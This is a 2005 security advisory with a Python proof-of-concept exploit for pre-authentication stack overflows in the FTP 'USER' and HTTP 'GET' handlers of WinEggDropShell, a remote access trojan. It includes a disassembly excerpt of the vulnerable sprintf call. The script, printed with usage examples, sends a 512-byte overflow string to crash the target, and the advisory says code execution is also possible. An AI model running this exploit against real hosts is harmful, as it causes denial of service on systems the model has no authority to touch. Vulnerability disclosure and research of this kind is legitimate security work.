WinEggDropShell Multiple Remote Stack Overflow
WinEggDropShell Multiple Remote Stack Overflow
by Sowhat
2005.12.02
http://secway.org/advisory/AD20051202.txt
http://secway.org/exploit/wineggdropshell_bof.py.txt
Affected:
WinEggDropShell Eterntiy version (1.7)
Other version may be vulnerable toooooo
Overview:
WinEggDropShell is a popular Chinese RAT (remote access trojan).
WineggDropShell provide HTTP Proxy/Socks Proxy/HTTP Server/FTP Server.
for more information, Goooooooooooooogle...
Multiple preauth stack overflow found in the HTTP/FTP server can be used to
execute arbitrary command or D0S (blue screen, yes, it's cool ;)
Vulnerability:
1. FTP USER bof
.text:100027BD push offset aUser ; "USER"
.text:100027C2 call _strlen
.text:100027C7 add esp, 4
.text:100027CA lea edi, [ebp+eax-103h]
.text:100027D1 push edi
.text:100027D2 push offset aS ; "%s"
.text:100027D7 lea edi, [ebp+var_208]
.text:100027DD push edi ; char *
.text:100027DE call _sprintf ; emmmmm, ;)
_ReceiveSocketBuffer can maximum recv 0x200h, but [ebp+var_208] is
a 0x104h buffer.
2. FTP Server Pass Command
.............
3. HTTP GET stack overflow!
GET /A*260
PoC:
http://secway.org/exploit/wineggdropshell_bof.py.txt
Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
Reference:
[1] https://www.openrce.org/articles/full_view/18
[2] http://www.ccc.de/congress/2005/
[3] http://secway.org
#!/usr/bin/python
# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
# HTTP Server "GET" && FTP Server "USER" "PASS" command
# Bug Discoverd and coded by Sowhat
# Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
# http://secway.org
# 2005-10-11
# Affected:
# WinEggDropShell Eterntiy version
# Other version may be vulnerable toooooo
import sys
import string
import socket
if (len(sys.argv) != 4):
print
"##########################################################################"
print "# WinEggDropShell Multipe PreAuth Remote Stack Overflow
PoC #"
print "# This Poc will BOD the vulnerable target
#"
print "# Bug Discoverd and coded by Sowhat
#"
print "# http://secway.org
#"
print
"##########################################################################"
print "\nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Port\n"
print "Example: \n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80"
print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21"
sys.exit(0)
host = sys.argv[2]
port = string.atoi(sys.argv[3])
if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")):
request = "USER " + 'A'*512 + "\r"
if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")):
request = "GET /" + 'A'*512 + " HTTP/1.1 \r\n"
exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.connect((host,port))
exp.send(request)
---EOF-----
--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"